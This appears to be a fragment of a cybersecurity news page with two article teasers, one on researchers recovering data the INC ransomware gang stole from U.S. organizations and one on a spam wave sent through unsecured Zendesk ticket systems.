An operational security failure allowed researchers to recover data that the INC ransomware gang stole from a dozen U.S. organizations. […] Bill Toulas
-
Zendesk ticket systems hijacked in massive global spam wave
People worldwide are being targeted by a massive spam wave originating from unsecured Zendesk support systems, with victims reporting receiving hundreds of emails with strange and sometimes alarming subject lines. […] Lawrence Abrams